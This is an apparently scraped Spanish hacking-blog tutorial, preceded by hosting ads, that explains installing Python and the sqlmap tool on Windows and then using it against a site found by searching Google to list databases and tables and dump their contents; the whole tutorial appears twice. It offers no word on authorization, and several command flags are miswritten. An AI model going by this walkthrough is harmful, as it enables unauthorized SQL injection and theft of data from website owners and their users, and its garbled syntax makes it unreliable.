Hackvirus
hackvirus
Si buscas
hosting web,
dominios web,
correos empresariales o
crear páginas web gratis,
ingresa a
PaginaMX
Por otro lado, si buscas crear códigos qr online ingresa al Creador de Códigos QR más potente que existe
Empecemos con la herramienta SQLMAP WINDOWS (LEER)
- Para auditorías a bases de datos bien este tuto es muy sencillo no profundizare
- Es una herramienta que viene en blacktrak, blackbuntu kai y demás.. distros para testing
- solo se baja y por comandos se instala solo en esta ocasión me enfocare a Windows
- La página oficial es www.sqlmap.org
- Descargar
ATENCION
ENTRAN AL C:
Accesos rapidos:
Win+e entran a el disco duro
Crean una carpeta en el C: con el nombre de sqlmap
- Descomprimen el zip en la ubicación de la carpeta (ADENTRO DE LA CARPETA)
- C:sqlmap
Pasemos a la siguiente parte:
Sqlmap está escrito en python por lo tanto necesitamos el intérprete para ejecutar tales paquetes :D
Descargamos el archivo desde la página oficial
www.python.org
http://www.python.org/download/
Python 2.7.3 Windows Installer (Windows binary -- does not include source)
Python 3.3.0 Windows x86 MSI Installer (Windows binary -- does not include source)
Descargamos el que se vase a nuestras necesidades si el S.O. es de 32 =86 o 64 bits
Lo intalamos siguiente siguiente siguiente=è finalizar
Como recomendación REINICIAR EL WINDOWS (ya que es una mierda en esa parte)(no es necesario pero para evitar problemas)
Ya reinada la maquina
ES NECESARIO EJECUTAR EL CDM COMO administrador
En ella escribimos cmd o CMD (símbolos del sistema)
Ya en ella los comandos
cd..
cd..
cd..
hasta que nos muestre esta ubicacion
C:/
En esta dirección escribimos
cd sqlmap (para abrir la carpeta del sqlmap que descargamos y descomprimimos anterior mente)
Bien eso es todo ahora a trabajar buscan una página vulnerable (NO ENTRARE A ESO OK ESTA GOOGLE) NO TODAS MAS WEBS SON VULNERABLES OK
www.urlvulnerable.com/index.php?id=23
EN EL CMD ESCRIVIMOS
1.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 (un espacio)—dbs
Si es vulnerable nos mostrara las bases de datos
2.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) --tables
3.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)--tables
4.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)-(nombre de la tabla) -- dump
O bien seria-- columns ya encotradas las columnas desgargar las columnas con --dump
Bien eso es todo
Algo básico y si no para mayor inforacion busquen en youtube hai muy buenos videos de sqlmap
Es lo mismo que en blacktrack o blackbuntu o blackbox etc…. Kali
Fin
- Para auditorías a bases de datos bien este tuto es muy sencillo no profundizare
- Es una herramienta que viene en blacktrak, blackbuntu kai y demás.. distros para testing
- solo se baja y por comandos se instala solo en esta ocasión me enfocare a Windows
- La página oficial es www.sqlmap.org
- Descargar
ATENCION
ENTRAN AL C:
Accesos rapidos:
Win+e entran a el disco duro
Crean una carpeta en el C: con el nombre de sqlmap
- Descomprimen el zip en la ubicación de la carpeta (ADENTRO DE LA CARPETA)
- C:sqlmap
Pasemos a la siguiente parte:
Sqlmap está escrito en python por lo tanto necesitamos el intérprete para ejecutar tales paquetes :D
Descargamos el archivo desde la página oficial
www.python.org
http://www.python.org/download/
Python 2.7.3 Windows Installer (Windows binary -- does not include source)
Python 3.3.0 Windows x86 MSI Installer (Windows binary -- does not include source)
Descargamos el que se vase a nuestras necesidades si el S.O. es de 32 =86 o 64 bits
Lo intalamos siguiente siguiente siguiente=è finalizar
Como recomendación REINICIAR EL WINDOWS (ya que es una mierda en esa parte)(no es necesario pero para evitar problemas)
Ya reinada la maquina
ES NECESARIO EJECUTAR EL CDM COMO administrador
En ella escribimos cmd o CMD (símbolos del sistema)
Ya en ella los comandos
cd..
cd..
cd..
hasta que nos muestre esta ubicacion
C:/
En esta dirección escribimos
cd sqlmap (para abrir la carpeta del sqlmap que descargamos y descomprimimos anterior mente)
Bien eso es todo ahora a trabajar buscan una página vulnerable (NO ENTRARE A ESO OK ESTA GOOGLE) NO TODAS MAS WEBS SON VULNERABLES OK
www.urlvulnerable.com/index.php?id=23
EN EL CMD ESCRIVIMOS
1.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 (un espacio)—dbs
Si es vulnerable nos mostrara las bases de datos
2.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) --tables
3.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)--tables
4.- sqlmap.py u- www.urlvulnerable.com/index.php?id=23 -(nombre de la base de datos) (un espacio)-(nombre de la tabla) -- dump
O bien seria-- columns ya encotradas las columnas desgargar las columnas con --dump
Bien eso es todo
Algo básico y si no para mayor inforacion busquen en youtube hai muy buenos videos de sqlmap
Es lo mismo que en blacktrack o blackbuntu o blackbox etc…. Kali
Fin